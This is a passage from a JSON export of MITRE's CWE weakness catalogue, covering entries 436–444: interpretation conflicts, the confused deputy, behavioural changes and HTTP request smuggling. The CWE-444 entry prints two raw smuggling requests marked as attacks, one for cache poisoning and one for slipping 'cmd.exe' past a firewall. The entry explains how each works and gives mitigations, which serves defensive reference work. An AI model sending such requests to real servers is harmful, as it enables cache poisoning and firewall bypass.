Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Multiple Interpretation Error (MIE)","attr":{"@_Date":"2008-04-11"}}}},"437":{"attr":{"@_ID":"437","@_Name":"Incomplete Model of Endpoint Features","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint\'s features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"HTTP request smuggling is an attack against an intermediary such as a proxy. This attack works because the proxy expects the client to parse HTTP headers one way, but the client parses them differently."},{"Intro_Text":"Anti-virus products that reside on mail servers can suffer from this issue if they do not know how a mail client will handle a particular attachment. The product might treat an attachment type as safe, not knowing that the client\'s configuration treats it as executable."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Unhandled Features"}},"Notes":{"Note":{"#text":"This can be related to interaction errors, although in some cases, one of the endpoints is not performing correctly according to specification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Extra Unhandled Features","attr":{"@_Date":"2008-04-11"}}}},"439":{"attr":{"@_ID":"439","@_Name":"Behavioral Change in New Version or Environment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A\'s behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Functional change"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1976","Description":"Linux kernel 2.2 and above allow promiscuous mode using a different method than previous versions, and ifconfig is not aware of the new method (alternate path property).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1976"},{"Reference":"CVE-2005-1711","Description":"Product uses defunct method from another product that does not return an error code and allows detection avoidance.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1711"},{"Reference":"CVE-2003-0411","Description":"chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"CHANGE Behavioral Change"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}],"Previous_Entry_Name":{"#text":"Behavioral Change","attr":{"@_Date":"2008-04-11"}}}},"440":{"attr":{"@_ID":"440","@_Name":"Expected Behavior Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A feature, API, or function does not perform according to its specification.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0187","Description":"Program uses large timeouts on \\"undeserving\\" to compensate for inconsistency of support for linked lists.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0187"},{"Reference":"CVE-2003-0465","Description":"\\"strncpy\\" in Linux kernel acts different than libc on x86, leading to expected behavior difference - sort of a multiple interpretation error?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0465"},{"Reference":"CVE-2005-3265","Description":"Buffer overflow in product stems the use of a third party library function that is expected to have internal protection against overflows, but doesn\'t.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3265"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Expected behavior violation"}},"Notes":{"Note":{"#text":"The behavior of an application that is not consistent with the expectations of the developer may lead to incorrect use of the software.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relevant_Properties, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Observed_Examples, Theoretical_Notes"}]}},"441":{"attr":{"@_ID":"441","@_Name":"Unintended Proxy or Intermediary (\'Confused Deputy\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product\'s control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.","Extended_Description":{"xhtml:p":["If an attacker cannot directly contact a target, but the product has access to the target, then the attacker can send a request to the product and have it be forwarded to the target. The request would appear to be coming from the product\'s system, not the attacker\'s system. As a result, the attacker can bypass access controls (such as firewalls) or hide the source of malicious requests, since the requests would not be coming directly from the attacker.","Since proxy functionality and message-forwarding often serve a legitimate purpose, this issue only becomes a vulnerability when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The product runs with different privileges or on a different system, or otherwise has different levels of access than the upstream component;","The attacker is prevented from making the request directly to the target; and","The attacker can create a request that the proxy does not explicitly intend to be forwarded on the behalf of the requester. Such a request might point to an unexpected hostname, port number, hardware IP, or service. Or, the request might be sent to an allowed service, but the request could contain disallowed directives, commands, or resources."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Confused Deputy","Description":"This weakness is sometimes referred to as the \\"Confused deputy\\" problem, in which an attacker misused the authority of one victim (the \\"confused deputy\\") when targeting another victim."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Gain Privileges or Assume Identity","Hide Activities","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Enforce the use of strong mutual authentication mechanism between the two parties."},{"Phase":"Architecture and Design","Description":"Whenever a product is an intermediary or proxy for\\n transactions between two other components, the proxy core\\n should not drop the identity of the initiator of the\\n transaction. The immutability of the identity of the\\n initiator must be maintained and should be forwarded all the\\n way to the target."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A SoC contains a microcontroller (running ring-3\\n (least trusted ring) code), a Memory Mapped Input Output\\n (MMIO) mapped IP core (containing design-house secrets),\\n and a Direct Memory Access (DMA) controller, among several\\n other compute elements and peripherals. The SoC implements\\n access control to protect the registers in the IP core\\n (which registers store the design-house secrets) from\\n malicious, ring-3 (least trusted ring) code executing on\\n the microcontroller. The DMA controller, however, is not\\n blocked off from accessing the IP core for functional\\n reasons.","Example_Code":[{"#text":"The code in ring-3 (least trusted ring) of the\\n microcontroller attempts to directly read the protected\\n registers in IP core through MMIO transactions. However,\\n this attempt is blocked due to the implemented access\\n control. Now, the microcontroller configures the DMA core\\n to transfer data from the protected registers to a memory\\n region that it has access to. The DMA core, which is\\n acting as an intermediary in this transaction, does not\\n preserve the identity of the microcontroller and, instead,\\n initiates a new transaction with its own identity. Since\\n the DMA core has access, the transaction (and hence, the\\n attack) is successful.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The DMA\\n core forwards this transaction with the identity of the\\n code executing on the microcontroller, which is the\\n original initiator of the end-to-end transaction. Now the\\n transaction is blocked, as a result of forwarding the\\n identity of the true initiator which lacks the permission\\n to access the confidential MMIO mapped IP core.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"The weakness here is that the intermediary or the\\n proxy agent did not ensure the immutability of the\\n identity of the microcontroller initiating the\\n transaction."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0017","Description":"FTP bounce attack. The design of the protocol allows an attacker to modify the PORT command to cause the FTP server to connect to other machines besides the attacker\'s.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0017"},{"Reference":"CVE-1999-0168","Description":"RPC portmapper could redirect service requests from an attacker to another entity, which thinks the requests came from the portmapper.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0168"},{"Reference":"CVE-2005-0315","Description":"FTP server does not ensure that the IP address in a PORT command is the same as the FTP user\'s session, allowing port scanning by proxy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0315"},{"Reference":"CVE-2002-1484","Description":"Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484"},{"Reference":"CVE-2004-2061","Description":"CGI script accepts and retrieves incoming URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061"},{"Reference":"CVE-2001-1484","Description":"Bounce attack allows access to TFTP from trusted side.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1484"},{"Reference":"CVE-2010-1637","Description":"Web-based mail program allows internal network scanning using a modified POP3 port number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637"},{"Reference":"CVE-2009-0037","Description":"URL-downloading library automatically follows redirects to file:// and scp:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unintended proxy/intermediary"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Proxied Trusted Channel"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":32,"Entry_Name":"Routing Detour"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"219"}},{"attr":{"@_CAPEC_ID":"465"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-432"}},{"attr":{"@_External_Reference_ID":"REF-1125"}}]},"Notes":{"Note":[{"#text":"This weakness has a chaining relationship with CWE-668 (Exposure of Resource to Wrong Sphere) because the proxy effectively provides the attacker with access to the target\'s resources that the attacker cannot directly obtain.","attr":{"@_Type":"Relationship"}},{"#text":"This could possibly be considered as an emergent resource.","attr":{"@_Type":"Maintenance"}},{"#text":"It could be argued that the \\"confused deputy\\" is a fundamental aspect of most vulnerabilities that require an active attacker. Even for common implementation issues such as buffer overflows, SQL injection, OS command injection, and path traversal, the vulnerable program already has the authorization to run code or access files. The vulnerability arises when the attacker causes the program to run unexpected code or access unexpected files.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, References, Relationship_Notes, Relationships, Theoretical_Notes, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-14","Modification_Comment":"Per Intel Corporation suggestion, added language to be inclusive to hardware: updated Demonstrative_Examples, Description, Extended_Description, Applicable_Platforms, Potential_Mitigation, Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships"}],"Previous_Entry_Name":{"#text":"Unintended Proxy/Intermediary","attr":{"@_Date":"2013-02-21"}}}},"443":{"attr":{"@_ID":"443","@_Name":"DEPRECATED: HTTP response splitting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-113.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): HTTP response splitting","attr":{"@_Date":"2021-07-20"}}}},"444":{"attr":{"@_ID":"444","@_Name":"Inconsistent Interpretation of HTTP Requests (\'HTTP Request Smuggling\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to \\"smuggle\\" a request to one device without the other device being aware of it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Non-Repudiation","Access Control"],"Impact":["Unexpected State","Hide Activities","Bypass Protection Mechanism"],"Note":"An attacker could create a request to exploit a number of weaknesses including 1) the request can trick the web server to associate a URL with another URLs webpage and caching the contents of the webpage (web cache poisoning attack), 2) the request can be structured to bypass the firewall protection mechanisms and gain unauthorized access to a web application, and 3) the request can invoke a script or a page that returns client credentials (similar to a Cross Site Scripting attack)."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use a web server that employs a strict HTTP parsing procedure, such as Apache [REF-433]."},{"Phase":"Implementation","Description":"Use only SSL communication."},{"Phase":"Implementation","Description":"Terminate the client session after each request."},{"Phase":"System Configuration","Description":"Turn all pages to non-cacheable."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, a malformed HTTP request is sent to a website that includes a proxy server and a web server with the intent of poisoning the cache to associate one webpage with another malicious webpage.","Example_Code":[{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"POST http://www.website.com/foobar.html HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 0Content-Length: 44GET /poison.html HTTP/1.1Host: www.website.comBla: GET http://www.website.com/page_to_poison.html HTTP/1.1Host: www.website.comConnection: Keep-Alive","xhtml:br":["","","","","","","","","","",""]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...try {} catch (Exception ex) {...}","xhtml:br":["","",""],"xhtml:i":"// Set up response writer object","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Enumeration contentLengthHeaders = request.getHeaders(\\"Content-Length\\");int count = 0;while (contentLengthHeaders.hasMoreElements()) {}if (count > 1) {}else {}","xhtml:br":["","","","","","",""],"xhtml:i":"// check for multiple content length headers","xhtml:div":[{"#text":"count++;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// output error response"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// process request"}}]}}}}}}],"Body_Text":["When this request is sent to the proxy server, the proxy server parses the POST request in the first seven lines, and encounters the two \\"Content-Length\\" headers. The proxy server ignores the first header, so it assumes the request has a body of length 44 bytes. Therefore, it treats the data in the next three lines that contain exactly 44 bytes as the first request\'s body. The proxy then parses the last three lines which it treats as the client\'s second request.","The request is forwarded by the proxy server to the web server. Unlike the proxy, the web server uses the first \\"Content-Length\\" header and considers that the first POST request has no body, and the second request is the line with the first GET (note that the second GET is parsed by the web server as the value of the \\"Bla\\" header).","The requests the web server sees are \\"POST /foobar.html\\" and \\"GET /poison.html\\", so it sends back two responses with the contents of the \\"foobar.html\\" page and the \\"poison.html\\" page, respectively. The proxy matches these responses to the two requests it thinks were sent by the client \\"POST /foobar.html\\" and \\"GET /page_to_poison.html\\". If the response is cacheable, the proxy caches the contents of \\"poison.html\\" under the URL \\"page_to_poison.html\\", and the cache is poisoned! Any client requesting \\"page_to_poison.html\\" from the proxy would receive the \\"poison.html\\" page.","When a website includes both a proxy server and a web server some protection against this type of attack can be achieved by installing a web application firewall, or use a web server that includes a stricter HTTP parsing procedure or make all webpages non-cacheable.","Additionally, if a web application includes a Java servlet for processing requests, the servlet can check for multiple \\"Content-Length\\" headers and if they are found the servlet can return an error response thereby preventing the poison page to be cached, as shown below."]},{"Intro_Text":"In the following example, a malformed HTTP request is sent to a website that includes a web server with a firewall with the intent of bypassing the web server firewall to smuggle malicious code into the system..","Example_Code":{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"POST /page.asp HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Length: 49223zzz...zzz [\\"z\\" x 49152]POST /page.asp HTTP/1.0Connection: Keep-AliveContent-Length: 30POST /page.asp HTTP/1.0Bla: POST /page.asp?cmd.exe HTTP/1.0Connection: Keep-Alive","xhtml:br":["","","","","","","","","","","",""]}},"Body_Text":["When this request is sent to the web server, the first POST request has a content-length of 49,223 bytes, and the firewall treats the line with 49,152 copies of \\"z\\" and the lines with an additional lines with 71 bytes as its body (49,152+71=49,223). The firewall then continues to parse what it thinks is the second request starting with the line with the third POST request.","Note that there is no CRLF after the \\"Bla: \\" header so the POST in the line is parsed as the value of the \\"Bla:\\" header. Although the line contains the pattern identified with a worm (\\"cmd.exe\\"), it is not blocked, since it is considered part of a header value. Therefore, \\"cmd.exe\\" is smuggled through the firewall.","When the request is passed through the firewall the web server the first request is ignored because the web server does not find an expected \\"Content-Type: application/x-www-form-urlencoded\\" header, and starts parsing the second request.","This second request has a content-length of 30 bytes, which is exactly the length of the next two lines up to the space after the \\"Bla:\\" header. And unlike the firewall, the web server processes the final POST as a separate third request and the \\"cmd.exe\\" worm is smuggled through the firewall to the web server.","To avoid this attack a Web server firewall product must be used that is designed to prevent this type of attack."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2088","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2088"},{"Reference":"CVE-2005-2089","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2089"},{"Reference":"CVE-2005-2090","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090"},{"Reference":"CVE-2005-2091","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2091"},{"Reference":"CVE-2005-2092","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2092"},{"Reference":"CVE-2005-2093","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length 